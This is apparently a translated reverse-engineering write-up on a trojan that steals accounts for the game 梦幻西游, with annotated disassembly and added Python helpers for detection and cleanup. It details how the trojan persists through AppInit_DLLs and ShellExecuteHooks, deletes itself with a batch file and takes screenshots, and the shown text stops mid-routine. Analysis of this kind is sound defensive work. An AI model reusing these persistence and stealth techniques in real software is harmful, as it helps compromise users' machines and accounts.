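The naming scheme is worth pinning down, because it is what you would search the Fonts directory for. The following is an added example (my code, not the sample's or the original post's): it reproduces the sprintf call above and inverts it, recovering every (day, hour, minute, second) that could have produced a given file name. The mapping of the pushed words to wDay/wHour/wMinute/wSecond is my reading of the stack offsets in the listing; it agrees with the two names seen in the post, kb02412355.dll and kb0241295.dll (the 24th at 12:03:55 and at 12:09:05).

```python
import re
from datetime import datetime

FONTS_DIR = "C:\\WINDOWS\\Fonts\\"
NAME_FORMAT = "%s%s%d%d%d%d%d.dll"      # the sprintf format string at 004057DC
# Field order as read from the listing: SYSTEMTIME at [ebp-0x10], words pushed from
# [ebp-0xA], [ebp-8], [ebp-6], [ebp-4] = wDay, wHour, wMinute, wSecond (assumption, matches both observed names).
FIELD_RANGES = ((1, 31), (0, 23), (0, 59), (0, 59))
NAME_RE = re.compile(r"^kb0(\d{4,8})\.dll$", re.I)


def dropped_dll_path(local_time: datetime, fonts_dir=FONTS_DIR):
    """Reproduce the DLL path the dropper builds: prefix, "kb", a literal 0, then day/hour/minute/second."""
    return NAME_FORMAT % (fonts_dir, "kb", 0, local_time.day, local_time.hour,
                          local_time.minute, local_time.second)


def timestamp_candidates(filename):
    """Invert the scheme: all (day, hour, minute, second) tuples that print to this name.
    %d prints no leading zeros, so each field is one or two digits and ambiguous splits are possible."""
    m = NAME_RE.match(filename)
    if not m:
        return []
    digits = m.group(1)
    out = []

    def walk(pos, field, acc):
        if field == len(FIELD_RANGES):
            if pos == len(digits):
                out.append(tuple(acc))
            return
        for width in (1, 2):
            chunk = digits[pos:pos + width]
            if len(chunk) < width or (width == 2 and chunk[0] == "0"):
                break                      # a 2-digit field never starts with 0
            lo, hi = FIELD_RANGES[field]
            if lo <= int(chunk) <= hi:
                walk(pos + width, field + 1, acc + [int(chunk)])

    walk(0, 0, [])
    return out


def is_dropper_dll_name(filename):
    """IOC check for a file found in the Fonts directory: true if some valid timestamp produces this name."""
    return bool(timestamp_candidates(filename))


if __name__ == "__main__":
    print(dropped_dll_path(datetime(2009, 10, 24, 12, 3, 55)))
    print(timestamp_candidates("kb02412355.dll"))
```

Because the fields are not zero-padded, a name like kb02412355.dll is ambiguous (12:03:55, 12:35:05 and 01:23:55 on the 24th all print the same way), which is why the check accepts any consistent split rather than a single parse.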
OK, let's continue:
00401E9C |. 8D85 60FBFFFF lea eax, dword ptr [ebp-0x4A0]
00401EA2 |. 50 push eax ; /Arg3
00401EA3 |. 8D85 6CFEFFFF lea eax, dword ptr [ebp-0x194] ; |
00401EA9 |. 57 push edi ; |Arg2
00401EAA |. 50 push eax ; |Arg1
00401EAB |. E8 D2060000 call 00402582 ; \复件_Unp.00402582
Stack:
0012FB04 0012FE28 |Arg1 = 0012FE28 ASCII "C:\WINDOWS\Fonts\kb02412355.dll"
0012FB08 004057B4 |Arg2 = 004057B4 ASCII "{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}"
0012FB0C 0012FB1C \Arg3 = 0012FB1C ASCII "C:\WINDOWS\Fonts\kb0241295.dll"
What is this for? Replacing a file? Let's step into it.
{
00402585 |. 81EC 04080000 sub esp, 0x804
0040258B |. A0 74644000 mov al, byte ptr [0x406474]
00402590 |. 56 push esi
00402591 |. 57 push edi
00402592 |. 8885 FCFBFFFF mov byte ptr [ebp-0x404], al
00402598 |. B9 FF000000 mov ecx, 0xFF
0040259D |. 33C0 xor eax, eax
0040259F |. 8DBD FDFBFFFF lea edi, dword ptr [ebp-0x403]
004025A5 |. BE 02000080 mov esi, 0x80000002 ; HKEY_LOCAL_MACHINE
004025AA |. F3:AB rep stos dword ptr es:[edi]
004025AC |. 66:AB stos word ptr es:[edi]
004025AE |. AA stos byte ptr es:[edi]
004025AF |. 8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404]
004025B5 |. 50 push eax
004025B6 |. 68 88594000 push 00405988 ; appinit_dlls
004025BB |. 68 50594000 push 00405950 ; software\microsoft\windows nt\currentversion\windows
004025C0 |. 56 push esi
004025C1 |. E8 6FFFFFFF call 00402535 ; this is going to touch the registry
{
00402535 /$ 55 push ebp
00402536 |. 8BEC mov ebp, esp
00402538 |. 51 push ecx
00402539 |. 8D45 0C lea eax, dword ptr [ebp+0xC]
0040253C |. 56 push esi
0040253D |. 33F6 xor esi, esi
0040253F |. 50 push eax ; /pHandle
00402540 |. 6A 01 push 0x1 ; |Access = KEY_QUERY_VALUE
00402542 |. 56 push esi ; |Reserved => 0
00402543 |. FF75 0C push dword ptr [ebp+0xC] ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
00402546 |. FF75 08 push dword ptr [ebp+0x8] ; |hKey = HKEY_LOCAL_MACHINE
00402549 |. FF15 28404000 call dword ptr [<&advapi32.RegOpenKeyExA>] ; \RegOpenKeyExA
0040254F |. 85C0 test eax, eax
00402551 |. 75 1F jnz short 00402572
00402553 |. 8D45 08 lea eax, dword ptr [ebp+0x8]
00402556 |. 50 push eax ; /pBufSize
00402557 |. 8D45 FC lea eax, dword ptr [ebp-0x4] ; |
0040255A |. FF75 14 push dword ptr [ebp+0x14] ; |Buffer
0040255D |. 50 push eax ; |pValueType
0040255E |. 56 push esi ; |Reserved => NULL
0040255F |. FF75 10 push dword ptr [ebp+0x10] ; |ValueName = "AppInit_Dlls"
00402562 |. FF75 0C push dword ptr [ebp+0xC] ; |hKey = 5C
00402565 |. FF15 00404000 call dword ptr [<&advapi32.RegQueryValueExA>] ; \RegQueryValueExA
0040256B |. 85C0 test eax, eax
0040256D |. 75 03 jnz short 00402572
0040256F |. 6A 01 push 0x1
00402571 |. 5E pop esi
00402572 |> FF75 0C push dword ptr [ebp+0xC] ; /hKey
00402575 |. FF15 0C404000 call dword ptr [<&advapi32.RegCloseKey>] ; \RegCloseKey
0040257B |. 8BC6 mov eax, esi
0040257D |. 5E pop esi
0040257E |. C9 leave
0040257F \. C2 1000 retn 0x10
}
This helper only reads the current AppInit_DLLs value into the caller's buffer and returns 1 on success.
004025C6 |. FF75 08 push dword ptr [ebp+0x8] ; /s2 = "C:\WINDOWS\Fonts\kb02412355.dll"
004025C9 |. 8B3D 1C414000 mov edi, dword ptr [<&msvcrt.strstr>] ; |msvcrt.strstr
004025CF |. 8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404] ; |
004025D5 |. 50 push eax ; |s1 = "C:\WINDOWS\Fonts\kb02412355.dll"
004025D6 |. FFD7 call edi ; \strstr
004025D8 |. 59 pop ecx
004025D9 |. 85C0 test eax, eax ; search the existing value for this DLL path; if it is already there, skip the processing below, otherwise write it into the registry.
....
004026CA |> \8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404]
004026D0 |. 68 34594000 push 00405934 ; /software\classes\clsid\
004026D5 |. 50 push eax ; |dest
004026D6 |. E8 F1120000 call <jmp.&msvcrt._mbscpy> ; \strcpy
004026DB |. FF75 0C push dword ptr [ebp+0xC] ; /src
004026DE |. 8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404] ; |
004026E4 |. 50 push eax ; |dest
004026E5 |. E8 EE120000 call <jmp.&msvcrt._mbscat> ; \strcat
004026EA |. 8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404]
004026F0 |. 68 24594000 push 00405924 ; /\inprocserver32
004026F5 |. 50 push eax ; |dest
004026F6 |. E8 DD120000 call <jmp.&msvcrt._mbscat> ; \strcat
00402703 |. 83C4 1C add esp, 0x1C
00402706 |. 50 push eax ; /Arg6
00402707 |. 8D85 FCFBFFFF lea eax, dword ptr [ebp-0x404] ; |
0040270D |. FF75 08 push dword ptr [ebp+0x8] ; |Arg5
00402710 |. 6A 01 push 0x1 ; |Arg4 = 00000001
00402712 |. 6A 00 push 0x0 ; |Arg3 = 00000000
00402714 |. 50 push eax ; |Arg2
00402715 |. 56 push esi ; |Arg1
00402716 |. E8 C9FDFFFF call 004024E4 ; \复件_Unp.004024E4
Here it builds the string "SOFTWARE\Classes\CLSID\{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}\InprocServer32" and then calls 004024E4 once more.
So this time it writes the DLL's path under that key, registering the DLL as the in-process server of the CLSID.
0040271B |. 6A 00 push 0x0 ; /Arg6 = 00000000
0040271D |. 68 74644000 push 00406474 ; |Arg5 = 00406474
00402722 |. 6A 01 push 0x1 ; |Arg4 = 00000001
00402724 |. 68 B4574000 push 004057B4 ; |{9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00402729 |. 68 DC584000 push 004058DC ; |software\microsoft\windows\currentversion\explorer\shellexecutehooks
0040272E |. 56 push esi ; |Arg1 = 80000002
0040272F |. E8 B0FDFFFF call 004024E4 ; \复件_Unp.004024E4
No need to say more: this adds the CLSID under Explorer's ShellExecuteHooks.
}
}
00401ED9 E8 9BFEFFFF call 00401D79 ; enumerate processes
{
0040211C 55 push ebp
0040211D 8BEC mov ebp, esp
0040211F 81EC 28010000 sub esp, 0x128
00402125 837D 08 00 cmp dword ptr [ebp+0x8], 0x0 ; callback pointer
00402129 56 push esi
0040212A 74 61 je short 0040218D
0040212C 6A 00 push 0x0
0040212E 6A 02 push 0x2 ; TH32CS_SNAPPROCESS
00402130 E8 85180000 call <jmp.&kernel32.CreateToolhelp32Snapshot>
00402135 8BF0 mov esi, eax
00402137 83FE FF cmp esi, -0x1
0040213A 74 51 je short 0040218D
0040213C 57 push edi
0040213D 6A 49 push 0x49
0040213F 59 pop ecx
00402140 33C0 xor eax, eax
00402142 8DBD DCFEFFFF lea edi, dword ptr [ebp-0x124]
00402148 F3:AB rep stos dword ptr es:[edi]
0040214A 8D85 D8FEFFFF lea eax, dword ptr [ebp-0x128] ; PROCESSENTRY32
00402150 C785 D8FEFFFF 28010000 mov dword ptr [ebp-0x128], 0x128 ; dwSize
0040215A 50 push eax
0040215B 56 push esi
0040215C E8 53180000 call <jmp.&kernel32.Process32First>
00402161 5F pop edi
00402162 85C0 /test eax, eax
00402164 74 20 |je short 00402186
00402166 FF75 0C |push dword ptr [ebp+0xC]
00402169 8D85 D8FEFFFF |lea eax, dword ptr [ebp-0x128]
0040216F 50 |push eax
00402170 FF55 08 |call dword ptr [ebp+0x8] ; callback(&entry, arg); a zero return stops the walk
00402173 85C0 |test eax, eax
00402175 74 0F |je short 00402186
00402177 8D85 D8FEFFFF |lea eax, dword ptr [ebp-0x128]
0040217D 50 |push eax
0040217E 56 |push esi
0040217F E8 2A180000 |call <jmp.&kernel32.Process32Next>
00402184 ^EB DC \jmp short 00402162
00402186 56 push esi
00402187 FF15 0C414000 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
0040218D 5E pop esi
0040218E C9 leave
0040218F C2 0800 retn 0x8
This is a generic process walker: the callback passed in the first argument is invoked once per PROCESSENTRY32, and which callback 00401D79 passes is not shown here.
}
00401EDE E8 57080000 call 0040273A ; the next block should be the clean-up and finishing work:
{
0040273A /$ 55 push ebp
0040273B |. 8BEC mov ebp, esp
0040273D |. 81EC 10050000 sub esp, 0x510
00402743 |. 53 push ebx
00402744 |. 56 push esi
00402745 |. 57 push edi
00402746 |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-0x20C]
0040274C |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402751 |. 33FF xor edi, edi ; |
00402753 |. 50 push eax ; |PathBuffer
00402754 |. 57 push edi ; |hModule => NULL
00402755 |. FF15 CC404000 call dword ptr [<&kernel32.GetModuleFileNameA>] ; \GetModuleFileNameA
Gets the path of the current EXE.
0040275B |. FF15 94404000 call dword ptr [<&kernel32.GetTickCount>] ; [GetTickCount
00402761 |. 8BD8 mov ebx, eax
00402763 |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-0x20C]
00402769 |. 8B35 28414000 mov esi, dword ptr [<&msvcrt.sprintf>] ; msvcrt.sprintf
0040276F |. 53 push ebx ; /<%x>
00402770 |. 50 push eax ; |<%s>
00402771 |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-0x20C] ; |
00402777 |. 50 push eax ; |<%s>
00402778 |. 8D85 F0FAFFFF lea eax, dword ptr [ebp-0x510] ; |
0040277E |. 68 B8594000 push 004059B8 ; |:repeat\n\ndel "%s"\n\nif exist "%s" goto repeat\n\ndel "c:\del%x.bat"\n\n
00402783 |. 50 push eax ; |s
00402784 |. FFD6 call esi ; \sprintf
Builds the contents of the batch file.
00402786 |. 83C4 14 add esp, 0x14
00402789 |. 8D85 F0FCFFFF lea eax, dword ptr [ebp-0x310]
0040278F |. 53 push ebx
00402790 |. 68 A8594000 push 004059A8 ; c:\del%x.bat
00402795 |. 50 push eax
00402796 |. FFD6 call esi
00402798 |. 83C4 0C add esp, 0xC
0040279B |. 8D85 F0FCFFFF lea eax, dword ptr [ebp-0x310]
004027A1 |. 57 push edi ; /hTemplateFile
004027A2 |. 57 push edi ; |Attributes
004027A3 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004027A5 |. 57 push edi ; |pSecurity
004027A6 |. 6A 01 push 0x1 ; |ShareMode = FILE_SHARE_READ
004027A8 |. 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004027AD |. 50 push eax ; |FileName
004027AE |. FF15 00414000 call dword ptr [<&kernel32.CreateFileA>] ; \creates the batch file
Stack:
0012FA84 0012FCAC |FileName = "c:\del1237519.bat"
0012FA88 40000000 |Access = GENERIC_WRITE
0012FA8C 00000001 |ShareMode = FILE_SHARE_READ
0012FA90 00000000 |pSecurity = NULL
0012FA94 00000002 |Mode = CREATE_ALWAYS
0012FA98 00000000 |Attributes = 0
0012FA9C 00000000 \hTemplateFile = NULL
004027B4 |. 8BF0 mov esi, eax
004027B6 |. 83FE FF cmp esi, -0x1
004027B9 |. 74 74 je short 0040282F
004027BB |. 8D45 FC lea eax, dword ptr [ebp-0x4]
004027BE |. 57 push edi
004027BF |. 50 push eax
004027C0 |. 8D85 F0FAFFFF lea eax, dword ptr [ebp-0x510]
004027C6 |. 50 push eax ; /s
004027C7 |. E8 F4110000 call <jmp.&msvcrt.strlen> ; \strlen
004027CC |. 59 pop ecx ; |
004027CD |. 50 push eax ; |nBytesToWrite
004027CE |. 8D85 F0FAFFFF lea eax, dword ptr [ebp-0x510] ; |
004027D4 |. 50 push eax ; |Buffer
004027D5 |. 56 push esi ; |hFile
004027D6 |. FF15 08414000 call dword ptr [<&kernel32.WriteFile>] ; \writes the batch contents
004027DC |. 56 push esi ; /hObject
004027DD |. FF15 0C414000 call dword ptr [<&kernel32.CloseHandle>] ; \CloseHandle
004027E3 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-0x108]
004027E9 |. 68 03010000 push 0x103 ; /BufSize = 103 (259.)
004027EE |. 50 push eax ; |Buffer
004027EF |. 68 A0594000 push 004059A0 ; |comspec
004027F4 |. FF15 90404000 call dword ptr [<&kernel32.GetEnvironmentVariableA>] ; \GetEnvironmentVariableA
004027FA |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-0x108]
00402800 |. 68 98594000 push 00405998 ; / /c
00402805 |. 50 push eax ; |dest
00402806 |. E8 CD110000 call <jmp.&msvcrt._mbscat> ; \strcat
0040280B |. 8D85 F0FCFFFF lea eax, dword ptr [ebp-0x310]
00402811 |. 50 push eax ; /src
00402812 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-0x108] ; |
00402818 |. 50 push eax ; |dest
00402819 |. E8 BA110000 call <jmp.&msvcrt._mbscat> ; \strcat
0040281E |. 83C4 10 add esp, 0x10
00402821 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-0x108]
00402827 |. 57 push edi ; /ShowState
00402828 |. 50 push eax ; |CmdLine
00402829 |. FF15 8C404000 call dword ptr [<&kernel32.WinExec>] ; \with the batch path and command line built, run the batch file
Stack:
0012FA98 0012FEB4 |CmdLine = "C:\WINDOWS\system32\cmd.exe /c c:\del1237519.bat"
0012FA9C 00000000 \ShowState = SW_HIDE
Heh, this is the most common way for a program to delete itself: the batch file keeps retrying del until the EXE is no longer locked, then deletes the batch file too.
}
00401EE3 6A 00 push 0x0
00401EE5 FF15 58404000 call dword ptr [<&kernel32.ExitProcess>] ; kernel32.ExitProcess
That completes the first stage of the analysis. Let's take stock of what we have:
I. File operations:
1: The program's main file directory is C:\WINDOWS\Fonts\
2: The EXE is copied into that directory under a DLL name of the form "kb<local time digits>.dll".
3: The configuration file C:\WINDOWS\Fonts\AeioFs.dat records the DLL name and the ID.
4: C:\WINDOWS\Fonts\Encionc_ch.dat records the upload target URL and related information.
5: C:\WINDOWS\Fonts\DNSRicip.dat records the path of the captured images.
6: The program deletes a patch component: verclsid.exe.
7: It deletes itself via a batch file.
II. Registry operations:
1. It sets the registry value "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs" to the path of the DLL it dropped, so that the operating system loads the trojan file automatically (into every process that loads user32.dll).
2. It sets "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}\InprocServer32" to its own DLL path.
3. It adds its CLSID under "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks".
Good. At this point we know how to clean this virus out, and if we are really bored we could even write a cleanup tool.
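The check side of such a cleanup tool, as an added example (my code, not from the sample or the original post): it parses a .reg export of the keys listed above and flags the two load points this trojan uses, tying each ShellExecuteHooks CLSID back to the DLL registered as its InprocServer32, then turns the suspicious findings into the edits a removal tool would have to make. The export text is constructed to match the analysis; the second hook CLSID and its example_hook.dll are invented stand-ins for a legitimate entry that must not be flagged. Only a DLL living under \Fonts\ is treated as suspicious, which is this sample's habit, not a general rule.

```python
import re

# Constructed .reg export of the three locations the analysis identified, plus one unrelated hook.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\WINDOWS\\Fonts\\kb02412355.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}"=""
"{00000000-1111-2222-3333-444444444444}"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}\InprocServer32]
@="C:\\WINDOWS\\Fonts\\kb02412355.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-1111-2222-3333-444444444444}\InprocServer32]
@="C:\\WINDOWS\\system32\\example_hook.dll"
'''

APPINIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
HOOKS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
CLSID_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID"
SUSPICIOUS_DLL = re.compile(r"\\Fonts\\[^\\]+\.dll$", re.I)   # this sample drops into the Fonts directory


def _unescape(s):
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text):
    """Minimal .reg parser: {key: {value_name: data}}; the default value is stored under ''."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None:
            m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
            if m:
                name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
                data = m.group(2)
                if data.startswith('"') and data.endswith('"'):
                    data = _unescape(data[1:-1])
                keys[current][name] = data
    return keys


def _values(keys, key):
    for k, values in keys.items():
        if k.lower() == key.lower():
            return values
    return {}


def _lookup(keys, key, name):
    for n, v in _values(keys, key).items():
        if n.lower() == name.lower():
            return v
    return None


def find_persistence(keys):
    """Flag the two load points this trojan uses and resolve each hook CLSID to its DLL."""
    findings = []
    appinit = _lookup(keys, APPINIT_KEY, "AppInit_DLLs") or ""
    for dll in re.split(r"[ ,;]+", appinit.strip()):
        if dll:
            findings.append({"where": "AppInit_DLLs", "clsid": None, "dll": dll,
                             "suspicious": bool(SUSPICIOUS_DLL.search(dll))})
    for clsid in _values(keys, HOOKS_KEY):
        server = _lookup(keys, f"{CLSID_ROOT}\\{clsid}\\InprocServer32", "")
        findings.append({"where": "ShellExecuteHooks", "clsid": clsid, "dll": server,
                         "suspicious": server is not None and bool(SUSPICIOUS_DLL.search(server))})
    return findings


def cleanup_plan(findings):
    """Turn the suspicious findings into the registry and file edits a removal tool would make."""
    plan = []
    for f in findings:
        if not f["suspicious"]:
            continue
        if f["where"] == "AppInit_DLLs":
            plan.append(("clear_value", APPINIT_KEY, "AppInit_DLLs"))
        else:
            plan.append(("delete_value", HOOKS_KEY, f["clsid"]))
            plan.append(("delete_key", f"{CLSID_ROOT}\\{f['clsid']}"))
        plan.append(("delete_file", f["dll"]))
    return sorted(set(plan))


if __name__ == "__main__":
    for step in cleanup_plan(find_persistence(parse_reg_export(SAMPLE_REG))):
        print(step)
```

On a live machine the file deletion has to wait until the DLL is no longer mapped (AppInit_DLLs loads it into every user32 process, and Explorer holds the hook), so the registry edits go first and the file is removed after a reboot.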
Out of curiosity, and for the sake of completeness, let's now look at how this program runs as a DLL. When it is injected as a DLL, what it does should be the remaining two items of our plan:
2: What does it mainly target, and how does it operate (we already know it is a 梦幻 account-stealing trojan; the main point is to analyse how it steals the account).
3: How does it send the stolen information back, and where to.
We can guess that when running as a DLL its real functions are monitoring, collecting, and sending information.
Let's first use OD's string search to look:
00401071 /$ 55 push ebp ; 1
00401072 |. 8BEC mov ebp, esp
00401074 |. 81EC 84000000 sub esp, 0x84
0040107A |. 53 push ebx
0040107B |. 56 push esi
0040107C |. 57 push edi
0040107D |. FF15 8C414000 call dword ptr [<&user32.GetDesktopWindow>] ; [GetDesktopWindow
00401083 |. 85C0 test eax, eax
00401085 |. 74 56 je short 004010DD
00401087 |. 8B3D 7C414000 mov edi, dword ptr [<&user32.GetWindow>] ; user32.GetWindow
0040108D |. 6A 05 push 0x5 ; /Relation = GW_CHILD
0040108F |. 50 push eax ; |hWnd
00401090 |. FFD7 call edi ; \GetWindow
00401092 |. 8BF0 mov esi, eax
00401094 |. 85F6 test esi, esi
00401096 |. 74 45 je short 004010DD
00401098 |. FF15 14414000 call dword ptr [<&kernel32.GetCurrentProcessId>] ; [GetCurrentProcessId
0040109E |. 8BD8 mov ebx, eax
004010A0 |> 6A 02 /push 0x2 ; GW_HWNDNEXT
004010A2 |. 56 |push esi
004010A3 |. FFD7 |call edi
004010A5 |. 8BF0 |mov esi, eax
004010A7 |. 8D45 FC |lea eax, dword ptr [ebp-0x4]
004010AA |. 50 |push eax ; /pProcessID
004010AB |. 56 |push esi ; |hWnd
004010AC |. FF15 80414000 |call dword ptr [<&user32.GetWindowThreadProcessId>] ; \GetWindowThreadProcessId
004010B2 |. 395D FC |cmp dword ptr [ebp-0x4], ebx ; does the window belong to the process we are injected into?
004010B5 |. 75 22 |jnz short 004010D9
004010B7 |. 8D45 BC |lea eax, dword ptr [ebp-0x44]
004010BA |. 6A 3F |push 0x3F ; /Count = 3F (63.)
004010BC |. 50 |push eax ; |Buffer
004010BD |. 56 |push esi ; |hWnd
004010BE |. FF15 88414000 |call dword ptr [<&user32.GetClassNameA>] ; \GetClassNameA
004010C4 |. 8D45 BC |lea eax, dword ptr [ebp-0x44] ; the window class name obtained
004010C7 |. 68 F0564000 |push 004056F0 ; /wsgame
004010CC |. 50 |push eax ; |s1
004010CD |. FF15 3C414000 |call dword ptr [<&msvcrt._strcmpi>] ; \_stricmp
004010D3 |. 59 |pop ecx ; check whether this is 梦幻西游 (window class "wsgame")
004010D4 |. 85C0 |test eax, eax
004010D6 |. 59 |pop ecx
004010D7 |. 74 0B |je short 004010E4
004010D9 |> 85F6 |test esi, esi
004010DB |. ^75 C3 \jnz short 004010A0
004010DD |> 33C0 xor eax, eax
004010DF |. E9 DF000000 jmp 004011C3
004010E4 |> 8D85 7CFFFFFF lea eax, dword ptr [ebp-0x84]
So the DLL walks the top-level windows looking for one owned by its own host process whose class is "wsgame", i.e. the game window.
The code below checks whether a DLL has been loaded; presumably it is used to pick the right moment:
004019B1 . 53 push ebx
004019B2 . 55 push ebp
004019B3 . 56 push esi
004019B4 . BB 5C574000 mov ebx, 0040575C ; mhmain.dll
004019B9 . 57 push edi
004019BA . 8B3D E4404000 mov edi, dword ptr [<&kernel32.GetModuleHandleA>] ; kernel32.GetModuleHandleA
004019C0 . 53 push ebx ; /pModule => "mhmain.dll"
004019C1 . FFD7 call edi ; \GetModuleHandleA
004019C3 . 8B2D E8404000 mov ebp, dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep
004019C9 . 8BF0 mov esi, eax ; this polls whether mhmain.dll has been loaded (i.e. whether the game is active)
004019CB . 85F6 test esi, esi
004019CD . 75 10 jnz short 004019DF
004019CF > 68 E8030000 push 0x3E8 ; 1000 ms
004019D4 . FFD5 call ebp
004019D6 . 53 push ebx
004019D7 . FFD7 call edi
004019D9 . 8BF0 mov esi, eax
004019DB . 85F6 test esi, esi
004019DD . ^74 F0 je short 004019CF
Now another piece of code:
0040148D /75 66 jnz short 004014F5
0040148F |53 push ebx
00401490 |BB AC624000 mov ebx, 004062AC
00401495 |57 push edi
00401496 |BE 8C634000 mov esi, 0040638C
0040149B |53 push ebx
0040149C |56 push esi
0040149D |E8 2A250000 call <jmp.&msvcrt._mbscpy>
004014A2 |68 24574000 push 00405724 ; .bmp
004014A7 |56 push esi
004014A8 |E8 2B250000 call <jmp.&msvcrt._mbscat>
004014AD |83C4 10 add esp, 0x10
004014B0 |BF 18574000 mov edi, 00405718 ; tmpimg.bmp
004014B5 |57 push edi
004014B6 |FF15 8C414000 call dword ptr [<&user32.GetDesktopWindow>] ; user32.GetDesktopWindow
004014BC |50 push eax
004014BD |E8 5D150000 call 00402A1F ; capture a window to a .bmp file: (hWnd = desktop, filename = "tmpimg.bmp")
{
00402A29 68 80000000 push 0x80 ; FILE_ATTRIBUTE_NORMAL
00402A2E 6A 02 push 0x2 ; CREATE_ALWAYS
00402A30 53 push ebx
00402A31 53 push ebx
00402A32 68 00000040 push 0x40000000 ; GENERIC_WRITE
00402A37 FF75 0C push dword ptr [ebp+0xC] ; filename
00402A3A FF15 00414000 call dword ptr [<&kernel32.CreateFileA>] ; kernel32.CreateFileA
00402A40 83F8 FF cmp eax, -0x1
00402A43 8945 F8 mov dword ptr [ebp-0x8], eax ; hFile
00402A46 75 07 jnz short 00402A4F
00402A48 33C0 xor eax, eax
00402A4A E9 96020000 jmp 00402CE5
00402A4F 395D 08 cmp dword ptr [ebp+0x8], ebx ; hWnd == NULL?
00402A52 56 push esi
00402A53 57 push edi
00402A54 75 12 jnz short 00402A68
00402A56 8B35 6C414000 mov esi, dword ptr [<&user32.GetSystemMetrics>] ; user32.GetSystemMetrics
00402A5C 53 push ebx ; SM_CXSCREEN
00402A5D FFD6 call esi
00402A5F 6A 01 push 0x1 ; SM_CYSCREEN
00402A61 8945 F4 mov dword ptr [ebp-0xC], eax ; width
00402A64 FFD6 call esi
00402A66 EB 1C jmp short 00402A84
00402A68 8D45 B0 lea eax, dword ptr [ebp-0x50] ; RECT
00402A6B 50 push eax
00402A6C FF75 08 push dword ptr [ebp+0x8]
00402A6F FF15 70414000 call dword ptr [<&user32.GetClientRect>] ; user32.GetClientRect
00402A75 8B45 B8 mov eax, dword ptr [ebp-0x48] ; right
00402A78 2B45 B0 sub eax, dword ptr [ebp-0x50] ; - left
00402A7B 8945 F4 mov dword ptr [ebp-0xC], eax ; width
00402A7E 8B45 BC mov eax, dword ptr [ebp-0x44] ; bottom
00402A81 2B45 B4 sub eax, dword ptr [ebp-0x4C] ; - top
00402A84 FF75 08 push dword ptr [ebp+0x8]
00402A87 8945 FC mov dword ptr [ebp-0x4], eax ; height
00402A8A FF15 74414000 call dword ptr [<&user32.GetDC>] ; user32.GetDC
00402A90 8BF8 mov edi, eax
00402A92 57 push edi
00402A93 897D 0C mov dword ptr [ebp+0xC], edi ; reuse the filename slot for the window DC
00402A96 FF15 50404000 call dword ptr [<&gdi32.CreateCompatibleDC>] ; gdi32.CreateCompatibleDC
00402A9C FF75 FC push dword ptr [ebp-0x4]
00402A9F 8B35 4C404000 mov esi, dword ptr [<&gdi32.CreateCompatibleBitmap>] ; gdi32.CreateCompatibleBitmap
00402AA5 8945 E8 mov dword ptr [ebp-0x18], eax ; memory DC
00402AA8 FF75 F4 push dword ptr [ebp-0xC]
00402AAB 57 push edi
00402AAC FFD6 call esi ; CreateCompatibleBitmap(hdc, width, height)
00402AAE 6A 08 push 0x8
00402AB0 6A 08 push 0x8
00402AB2 57 push edi
00402AB3 8945 EC mov dword ptr [ebp-0x14], eax ; capture bitmap
00402AB6 FFD6 call esi ; an 8x8 scratch bitmap, used below to deselect the capture bitmap
00402AB8 68 2C040000 push 0x42C
00402ABD 6A 42 push 0x42 ; GHND
00402ABF 8945 D8 mov dword ptr [ebp-0x28], eax
00402AC2 FF15 EC404000 call dword ptr [<&kernel32.GlobalAlloc>] ; kernel32.GlobalAlloc
00402AC8 50 push eax
00402AC9 8945 D0 mov dword ptr [ebp-0x30], eax
00402ACC FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>] ; kernel32.GlobalLock
00402AD2 FF75 EC push dword ptr [ebp-0x14]
00402AD5 8B3D 48404000 mov edi, dword ptr [<&gdi32.SelectObject>] ; gdi32.SelectObject
00402ADB 8BF0 mov esi, eax ; esi = BITMAPINFO buffer (40-byte header + room for a 256-entry palette)
